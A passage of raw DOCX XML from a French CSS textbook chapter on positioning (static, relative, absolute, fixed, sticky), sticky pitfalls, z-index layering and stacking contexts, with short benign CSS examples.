          </w:p>
        </w:tc>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Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>static</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Flux normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeur par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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relative</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Reste dans le flux, se décale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Sa position d'origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Calage, contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>absolute</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Sort du flux, positionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ancêtre positionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Infobulle, badge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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fixed</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Sort du flux, fixé à l'écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Fenêtre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Barre d'action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sticky</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Flux normal puis figé au défilement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneur de défilement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En-tête de tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2476500"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f28.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.28 — Deux sorties du flux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le motif classique du badge positionné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.carte { position: relative; }        /* devient l'ancêtre */</w:t>
        <w:br/>
        <w:br/>
        <w:t>.badge {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-block-start: -.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-inline-end: -.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 999px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .1rem .45rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.2 Sticky : figer au bon moment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position: sticky</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> combine le flux normal et le positionnement fixe : l'élément défile normalement jusqu'à atteindre un seuil, puis reste visible tant que son conteneur est à l'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux usages légitimes de sticky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.sommaire {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: sticky;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  top: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-height: calc(100dvh - 2rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow: auto;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>thead th {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: sticky;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  top: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  z-index: 1;</w:t>
        <w:br/>
        <w:t>}</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STICKY NE FONCTIONNE PAS TOUJOURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un ancêtre avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>overflow: hidden</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> limite le collage.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Aucun seuil (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bottom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>) n'est défini.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Le conteneur est trop court : l'élément n'a pas la place de coller.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un ancêtre a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>display: contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, qui supprime la boîte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ces quatre situations expliquent la quasi-totalité des « sticky qui ne collent pas ». L'inspecteur permet de vérifier chaque ancêtre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.3 Empilement et z-index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'ordonne que des éléments positionnés ou des enfants de conteneurs flex ou grid. Il ne fonctionne pas sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position: static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une échelle de couches documentée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.menu     { position: absolute; z-index: 10; }</w:t>
        <w:br/>
        <w:t>.voile    { position: fixed;    z-index: 20; }</w:t>
        <w:br/>
        <w:t>.modale   { position: fixed;    z-index: 30; }</w:t>
        <w:br/>
        <w:t>.infobulle{ position: absolute; z-index: 40; }</w:t>
        <w:br/>
        <w:t>.notification { position: fixed; z-index: 50; }</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CONTEXTE D'EMPILEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Groupe d'éléments dont les </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>z-index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ne se comparent qu'entre eux. Un enfant ne peut jamais passer au-dessus d'un élément situé dans un contexte supérieur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un contexte d'empilement est créé par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non automatique, par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inférieur à 1, par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>isolation: isolate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contain: paint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. C'est la source des « mon menu passe sous un autre bloc malgré un z-index énorme ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>L'effet de bord le plus fréquent de `transform`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.carte { transform: translateY(0); }  /* crée un contexte ! */</w:t>
        <w:br/>
        <w:t>.menu  { z-index: 9999; }               /* reste enfermé dans ce contexte */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.66 — Quatre problèmes d'empilement et leur remède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8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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>z-index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ignoré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élément non positionné</w:t>
            </w:r>
          </w:p>
